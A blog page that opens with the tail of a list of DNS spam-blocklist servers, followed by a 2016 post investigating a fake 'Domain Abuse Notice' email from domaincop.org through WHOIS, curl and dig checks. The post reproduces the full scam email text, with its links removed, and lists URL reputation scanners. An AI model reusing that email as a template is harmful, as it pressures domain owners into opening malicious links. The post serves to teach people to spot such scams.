dnsbl-3.uceprotect.net
dnsbl.ahbl.org
dnsbl.inps.de
dnsbl.sorbs.net
drone.abuse.ch
drone.abuse.ch
duinv.aupads.org
dul.dnsbl.sorbs.net
dul.ru
dyna.spamrats.com
dynip.rothen.com
http.dnsbl.sorbs.net
images.rbl.msrbl.net
ips.backscatterer.org
ix.dnsbl.manitu.net
korea.services.net
misc.dnsbl.sorbs.net
noptr.spamrats.com
ohps.dnsbl.net.au
omrs.dnsbl.net.au
orvedb.aupads.org
osps.dnsbl.net.au
osrs.dnsbl.net.au
owfs.dnsbl.net.au
owps.dnsbl.net.au
pbl.spamhaus.org
phishing.rbl.msrbl.net
probes.dnsbl.net.au
proxy.bl.gweep.ca
proxy.block.transip.nl
psbl.surriel.com
rbl.interserver.net
rbl.megarbl.net
rdts.dnsbl.net.au
relays.bl.gweep.ca
relays.bl.kundenserver.de
relays.nether.net
residential.block.transip.nl
ricn.dnsbl.net.au
rmst.dnsbl.net.au
sbl.spamhaus.org
short.rbl.jp
smtp.dnsbl.sorbs.net
socks.dnsbl.sorbs.net
spam.abuse.ch
spam.dnsbl.sorbs.net
spam.rbl.msrbl.net
spam.spamrats.com
spamlist.or.kr
spamrbl.imp.ch
t3direct.dnsbl.net.au
tor.ahbl.org
tor.dnsbl.sectoor.de
torserver.tor.dnsbl.sectoor.de
ubl.lashback.com
ubl.unsubscore.com
virbl.bit.nl
virus.rbl.jp
virus.rbl.msrbl.net
web.dnsbl.sorbs.net
wormrbl.imp.ch
xbl.spamhaus.org
zen.spamhaus.org
zombie.dnsbl.sorbs.net

Reference

December 19, 2016 1 comment

Browser Database Hacking How to Security Spam

Shortest spam run ever – domaincop.org Domain Abuse Notice Spam

by blackMORE November 23, 2016

written by blackMORE

Woke up this morning and found two emails from domaincorp.org in my Inbox stating my domains are being used for spamming and spreading malwares recently. Subject line contained “Domain Abuse Notice” which looked serious.

I mean WOHA! I do write about ‘stuff’ but doesn’t mean I send out emails to anyone. I don’t even respond to my emails half the time cause I don’t really need another SEO expert, another advertiser, another promoter or a globally acclaimed graphics designer to design ‘tings’!

But then again, you read about all these reports that explains how malware and virus’s are served via Advertisement etc. So I decided to carefully examine the email and it’s contents in an attempt to find out more information. Before I even opened the actual email, I checked it’s header and Domain Whois. I always do this, specially Whois because you are unlikely to receive an abuse notice email from any domain that was registered few weeks back. Most abuse notice emails are served by large organizations and domains that has been around for years and built enough reputation for everyone to take them seriously.

Whois information

I checked their whois from https://who.is/whois/domaincop.org

Nice, Registered On 2016-11-22, Updated On 2016-11-22 and today is 2016-11-23. I mean duh, it’s still 22nd of November is some parts of the world. They also has PrivacyGuard enabled which means you cannot see the real owners name or details like darodar.com referrer spam.

Inspect URL and it’s content

The next obvious thing was to check the URL that was sent to me to view the abuse my domains has inflicted. erm, do I use a browser? Perhaps not, I decided to use cURL.

root@kali:~# curl -kv http://www.domaincop.org/<removed>
* Could not resolve host: www.domaincop.org
* Closing connection 0
curl: (6) Could not resolve host: www.domaincop.org

hang on, the domain seems to have no DNS response. Let’s double-check that with dig command

root@kali:~# dig www.domaincop.org

; <<>> DiG 9.10.3-P4-Debian <<>> www.domaincop.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64018
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.domaincop.org.        IN    A

;; AUTHORITY SECTION:
org.            704    IN    SOA    a0.org.afilias-nst.info. noc.afilias-nst.info. 2012251969 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: x.x.x.x#53(x.x.x.x)
;; WHEN: Wed Nov 23 10:42:53 AEDT 2016
;; MSG SIZE  rcvd: 109

dig returned NXDOMAIN response which means the domain doesn’t exists. It seems either they’ve disabled their domain and/or Cloudflare banned/removed them. In any case, there is no way to inspect that URL for me now. ‘sad panda’

[divider style=”dashed” top=”20″ bottom=”20″]

Sample email

Here’s one of emails I received from “Imogen Murray” <[email protected]>; (the other email was from “Isaac Wright” <[email protected]>; ) with exactly same content:

Dear Domain Owner,

Our system has detected that your domain:<removed>.com is being used for spamming and spreading malware recently.

You can download the detailed abuse report of your domain along with date/time of incidents.
Click Here<link-removed>

We have also provided detailed instruction on how to delist your domain from our blacklisting.

Please download the report immediately and take proper action within 24 hours otherwise your domain will be suspended permanently.

There is also possibility of legal action depend on severity and persistence of your abuse case.

Three Simple Steps:

1. Download your abuse report.

2. Check your domain abuse incidents along with date and time.

3. Take few simple steps for prevention and to avoid domain suspension.

Click Here to Download your Report<link-removed>

Please look into it and contact us.

Best Regards,

Domain Abuse Admin

DomainCop Inc.

Tel.: (139) 722-66-56

Conclusion

Not sure what this email was about, but in case you ever get these type of emails, here’s what you always do:

Check Domain Whois
Check the URL without actually going into it (cURL it)
Use online scanners to check the links
Check dig/nslookup info
Search in Google
If you must visit the URL, do it from a command line tool or from a VM.

In short, you are unlikely to get such emails from multiple senders from a domain that was setup yesterday, got banned today and has people around the world talking about it being a scam. Another way is to check spammy links is by using reputed providers online site review tools. Here’s a list of them:

Real Time Scanners:

Comodo Web Inspector: Examines the URL in real-time
Joe Sandbox URL Analyzer: Examines the URL in real time
Is It Hacked: Performs several of its own checks of the URL in real time and consults some blacklists
IsItPhishing: Assesses the specified URL in real-time
Sucuri SiteCheck: Scans the URL for malware in real time and looks it up in several blacklists
Zscaler Zulu URL Risk Analyzer: Examines the URL using real-time and historical techniques

Historical Reputation data:

AVG Website Safety Reports: Provides historical reputation data about the site
Blue Coat WebPulse Site Review: Looks up the website in BlueCoat’s database
BrightCloud URL/IP Lookup: Presents historical reputation data about the website
Cisco SenderBase: Presents historical reputation data about the website
Cymon: Presents data from various threat intel feeds
Deepviz: Offers historical threat intel data about IPs, domains, etc.
FortiGuard lookup: Displays the URL’s history and category
IBM X-Force Exchange: Provides historical data about IPs, URLs, etc.
Intel/McAfee: : Presents historical reputation data about the website
KnownSec: Presents historical reputation data about the website; Chinese language only
PhishTank: Looks up the URL in its database of known phishing websites
Malware Domain List: Looks up recently-reported malicious websites
MalwareURL: Looks up the URL in its historical list of malicious websites
McAfee Site Advisor: Presents historical reputation data about the website
MxToolbox: Queries multiple reputational sources for information about the IP or domain
Norton Safe Web: Presents historical reputation data about the website
Open Threat Exchange: Presents diverse threat intelligence data from AlienVault
PassiveTotal: Presents passive DNS and other threat intelligence data
Quttera ThreatSign: Scans the specified URL for the presence of malware
Reputation Authority: Shows reputational data on specified domain or IP address
Trend Micro: Presents historical reputation data about the website
Unmask Parasites: Looks up the URL in the Google Safe Browsing database
URL Blacklist: Looks up the URL in its database of suspicious sites
URL Query: Looks up the URL in its database of suspicious sites and examines the site’s content
URLVoid and IPVoid: Looks up the URL or IP in several blacklisting services
VirusTotal: Looks up the URL in several databases of malicious sites
vURL: Retrieves and displays the source code of the page; looks up its status in several blocklists
ThreatMiner: Presents diverse threat intelligence data

These are industry leaders for checking and categorizing Domains/URL’s and marking them accordingly. For new domains, use the Live scanners; for older domains, use the historical reputation scanners. In any case, stay safe and happy browsing.

November 23, 2016 14 comments

Newer Posts

Older Posts